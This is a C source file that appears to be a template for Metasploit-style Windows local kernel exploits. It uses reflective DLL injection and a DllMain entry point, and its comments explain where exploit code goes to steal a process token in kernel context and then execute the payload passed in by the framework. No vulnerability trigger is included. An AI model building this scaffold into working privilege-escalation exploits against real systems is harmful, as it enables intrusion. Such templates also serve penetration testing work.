// Make sure you leave these defines and includes alone.
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "kernel.h"

// Add your own defines/includes here.

DWORD WINAPI run_exploit(LPVOID lpPayload)
{
	// Put your required local variables here
	//LPVOID thing = malloc(100);

	do
	{
		// all of your exploit stuff goes here

		// Do some work, check for error, if fails, break.
		// TODO: remove this if not needed, otherwise modify
		// to run your own code.
		//if (FALSE)
		//{
		//	break;
		//}

		// prepare for kernel exploitation after the initial work has been done.
		// This allows for other helper functions to run inside the kernel. If
		// you forget to do this bit, then things in kernel land will crash!
		if (!prepare_for_kernel())
		{
			break;
		}

		// This is where the exploit should be run from. When executing your exploit,
		// make sure that the `steal_process_token()` function from kernel.h is executed
		// inside the kernel (and preferrably nothing more!). This will conduct the token stealing 
		// under the context of the kernel.

		// Check to see if things worked, and that we have a payload
		if (was_token_replaced() && lpPayload)
		{
			// If so, just go ahead and execute the payload that MSF sent us.
			execute_payload(lpPayload);
		}

	} while (0);

	// Free up your stuff here.
	//if (thing != NULL)
	//{
	//	free(thing);
	//}

	return 0;
}

////////////////////////////////////////////////////////////////////////////////////////////////////
//
//  There shouldn't be any need to modify anything below this line.
//
////////////////////////////////////////////////////////////////////////////////////////////////////

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
	BOOL bReturnValue = TRUE;
	switch (dwReason)
	{
	case DLL_QUERY_HMODULE:
		hAppInstance = hinstDLL;
		if (lpReserved != NULL)
		{
			*(HMODULE *)lpReserved = hAppInstance;
		}
		break;
	case DLL_PROCESS_ATTACH:
		hAppInstance = hinstDLL;
		// lpReserved should have been passed in by MSF and points
		// to the shellcode/payload that is to be executed if the
		// exploit actually succeeds.
		run_exploit(lpReserved);
		break;
	case DLL_PROCESS_DETACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
		break;
	}
	return bReturnValue;
}
